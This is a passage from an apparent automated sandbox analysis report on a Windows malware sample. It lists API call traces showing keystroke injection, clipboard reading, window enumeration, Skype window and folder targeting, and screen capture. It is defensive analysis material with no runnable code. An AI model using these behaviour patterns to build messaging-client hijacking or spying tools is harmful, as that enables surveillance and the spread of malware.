                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045B020), ref: 0041D055
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041D066
                                                                                                                                                                                                                                                      • SendMessageA.USER32(0000004A,00000000), ref: 0041D082
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045B020), ref: 0041D092
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeaveMessageSendlstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2615675618-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c74f56ab4b2f4d99c8cf02e5dac5e513ef1ef44eafc1b19ff3713757b601000
                                                                                                                                                                                                                                                      • Instruction ID: 04bdf258bc530c0cdee2ac19c1b7621b2973c0a551cbe2d9e9c14f2e41fc7480
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c74f56ab4b2f4d99c8cf02e5dac5e513ef1ef44eafc1b19ff3713757b601000
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59F08271900304EBCB119FA4EC08B9E7BB8EB09302F008075ED16E2161D73486559BAE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004154A0
                                                                                                                                                                                                                                                        • Part of subcall function 00415285: SetForegroundWindow.USER32(?), ref: 00415292
                                                                                                                                                                                                                                                        • Part of subcall function 00415285: SetForegroundWindow.USER32(?), ref: 00415295
                                                                                                                                                                                                                                                        • Part of subcall function 00415285: SetForegroundWindow.USER32(?), ref: 00415298
                                                                                                                                                                                                                                                        • Part of subcall function 00415285: SetForegroundWindow.USER32(?), ref: 0041529B
                                                                                                                                                                                                                                                        • Part of subcall function 00415285: SetForegroundWindow.USER32(?), ref: 0041529E
                                                                                                                                                                                                                                                        • Part of subcall function 00415285: Sleep.KERNEL32(00000064,?,?,00415396,?), ref: 004152A2
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 004154B0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004154B8
                                                                                                                                                                                                                                                        • Part of subcall function 00414F30: SendInput.USER32(00000001,?,0000001C), ref: 00414F69
                                                                                                                                                                                                                                                        • Part of subcall function 00414F30: SendInput.USER32(00000001,?,0000001C), ref: 00414F8F
                                                                                                                                                                                                                                                        • Part of subcall function 00414F30: SendInput.USER32(00000001,?,0000001C), ref: 00414FB5
                                                                                                                                                                                                                                                        • Part of subcall function 00414F30: Sleep.KERNEL32(00000064), ref: 00414FB9
                                                                                                                                                                                                                                                        • Part of subcall function 00414F30: SendInput.USER32(00000001,?,0000001C), ref: 00414FE7
                                                                                                                                                                                                                                                        • Part of subcall function 00414F30: SendInput.USER32(00000001,?,0000001C), ref: 00415011
                                                                                                                                                                                                                                                        • Part of subcall function 00414F30: SendInput.USER32(00000001,?,0000001C), ref: 0041503B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004154C1
                                                                                                                                                                                                                                                        • Part of subcall function 004139A0: IsClipboardFormatAvailable.USER32(00000001), ref: 004139A3
                                                                                                                                                                                                                                                        • Part of subcall function 004139A0: OpenClipboard.USER32(00000000), ref: 004139AF
                                                                                                                                                                                                                                                        • Part of subcall function 004139A0: GetClipboardData.USER32(00000001), ref: 004139BB
                                                                                                                                                                                                                                                        • Part of subcall function 004139A0: CloseClipboard.USER32 ref: 004139C7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InputSend$ForegroundSleepWindow$Clipboard$AvailableCloseDataFocusFormatOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3330334153-0
                                                                                                                                                                                                                                                      • Opcode ID: 83504add1d1dedb3060f3dacfa7b4d1322a3a36fe359fba6de55aa8246b620a7
                                                                                                                                                                                                                                                      • Instruction ID: dee85f7f1a3561ffc2b023e0868ec920ac2daafd16a2ad31e82ed3c30e12405c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83504add1d1dedb3060f3dacfa7b4d1322a3a36fe359fba6de55aa8246b620a7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FE08632A583126FD5053BA1EC06A9E3F51DF80360F00046BF204440E4CE7654A28A5E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004218F5
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045A330), ref: 00421905
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_0002108F,00000000), ref: 00421912
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000F), ref: 0042191A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CriticalEnterEnumSectionWindows
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2151141519-0
                                                                                                                                                                                                                                                      • Opcode ID: 73382d69a21fc8b10e3f2b6feb81f70276a3830f2d7b93a82bb811b2617987ba
                                                                                                                                                                                                                                                      • Instruction ID: d93265669e9007938a92f4f787627f2676029b5fa9748b48d493c5193711b42f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73382d69a21fc8b10e3f2b6feb81f70276a3830f2d7b93a82bb811b2617987ba
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE01234BC8365B7E5206791BC4BB2626109B1AF16FE04033BE05251F189ED1576DBAF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045A330), ref: 0041C635
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_0001C4C8,00000000), ref: 0041C644
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041C64C
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045A330), ref: 0041C663
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterEnumLeaveSleepWindows
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2330576054-0
                                                                                                                                                                                                                                                      • Opcode ID: d89c22c42e57aabd3498cbb19ec627ac84339c1964f242cdbe1cc6d0312297bb
                                                                                                                                                                                                                                                      • Instruction ID: dcee21a05d3045d363dcd02448f6caa3d6531bcd56cca3f8a45e9d0838230e62
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d89c22c42e57aabd3498cbb19ec627ac84339c1964f242cdbe1cc6d0312297bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E01D31655210DBD3105750BC0DBD53754BB26727F515177F905901A0C7780D73CAAF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Info
                                                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                                                      • API String ID: 1807457897-3032137957
                                                                                                                                                                                                                                                      • Opcode ID: feac7f76dc94b5783e4b3582f96ef2564f4ba6abda2b2c6b5d659883fdff4339
                                                                                                                                                                                                                                                      • Instruction ID: 33b27815b10cd5ae0d9f75d352e8626930fb2950cd5553c77a0905c978949869
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: feac7f76dc94b5783e4b3582f96ef2564f4ba6abda2b2c6b5d659883fdff4339
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2418B302002786EEF158B64FC59BFA7FE8EF86300F5404E2D545C7192D6A89A85CB9D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,776AC310,02160CA8,C:\Windows\system32\,?,?,?,004240FE,776AC310), ref: 004271BF
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,004240FE,776AC310,C:\Windows\system32\,76AF0F00,00422306), ref: 004271E2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                      • String ID: C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 626452242-1520839452
                                                                                                                                                                                                                                                      • Opcode ID: b6d2fbc5a7950e7220097fdfe06a27bff97ae25d781c094df7e0fdd367205ce7
                                                                                                                                                                                                                                                      • Instruction ID: 9976f3b9e9c515abf8fe5d525c105cf3f8f804c2e02001ad50b0d814c6acf228
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6d2fbc5a7950e7220097fdfe06a27bff97ae25d781c094df7e0fdd367205ce7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA11547170A135FA9B21DAA6BC44C9FBFACEE057B47600597F514E2290DB349D00D6B8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0041BD31
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000064), ref: 0041BD78
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassNameProcessThreadWindow
                                                                                                                                                                                                                                                      • String ID: tSkMainForm.
                                                                                                                                                                                                                                                      • API String ID: 2910564809-1686697352
                                                                                                                                                                                                                                                      • Opcode ID: c0996536efc8a268fa7003f78edd98bd0af715f5713e0dc792ad712e708df12d
                                                                                                                                                                                                                                                      • Instruction ID: d7fda74a93f7a17c98ac35d37922188cbf33932d92a6ec5a3ef396d887f97dae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0996536efc8a268fa7003f78edd98bd0af715f5713e0dc792ad712e708df12d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD11A5326143099FEB24DF78EC45BEE77E8EB05304F208026F921D2261E774D555CBA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,;/B,00000000,00000000,?,?,?,00422ED1,?,00000000,00000002,?,?,00000000,?,00422F3B), ref: 00425DED
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00425DFA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                      • String ID: ;/B
                                                                                                                                                                                                                                                      • API String ID: 2976181284-1571933106
                                                                                                                                                                                                                                                      • Opcode ID: 51b5db301dd2dd0cdb45fe7147b99e41ff3a2e1b340a18d94c7725a81c000008
                                                                                                                                                                                                                                                      • Instruction ID: 6d547dc73a785259a919e0abce46a1d08874d946646b1649345a307199c2f05a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51b5db301dd2dd0cdb45fe7147b99e41ff3a2e1b340a18d94c7725a81c000008
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6014531714A615BC710DF78FC5862637A49B00335FA10B2EF422CB1E1EBB8CE15870A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,Skype), ref: 0041C15A
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: Sleep.KERNEL32(?,76AF23A0,00000011), ref: 00406726
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: wsprintfA.USER32 ref: 00406741
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindFirstFileA.KERNEL32(?,?), ref: 00406754
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: wsprintfA.USER32 ref: 00406798
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindNextFileA.KERNEL32(00000000,00000010), ref: 00406820
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: FindClose.KERNEL32(00000000), ref: 00406830
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,Skype), ref: 0041C185
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: lstrcpyA.KERNEL32(?,00000028,00000000), ref: 004067BB
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: lstrcatA.KERNEL32(?,0042A3B0), ref: 004067CD
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: lstrcatA.KERNEL32(?,?), ref: 004067DD
                                                                                                                                                                                                                                                        • Part of subcall function 00406718: SetFileAttributesA.KERNEL32(?,00000080), ref: 004067F8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$FileFind$wsprintf$AttributesCloseFirstFolderFromListLocationMallocNextPathSleepSpeciallstrcpy
                                                                                                                                                                                                                                                      • String ID: Skype
                                                                                                                                                                                                                                                      • API String ID: 2716033973-477203962
                                                                                                                                                                                                                                                      • Opcode ID: f6e372764f2739d3fa2bda75dc2356e30d339903e385cd2196b87c1aa44673b1
                                                                                                                                                                                                                                                      • Instruction ID: c1a38189545c508915f4712d1c6320414e78e6e9c0f6af7b9b33ec3efcade0da
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6e372764f2739d3fa2bda75dc2356e30d339903e385cd2196b87c1aa44673b1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101A777E4821866DB60D6559C06FC677AC8794714F0004E6B688E70C0EAF4A6C58EA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041133D
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
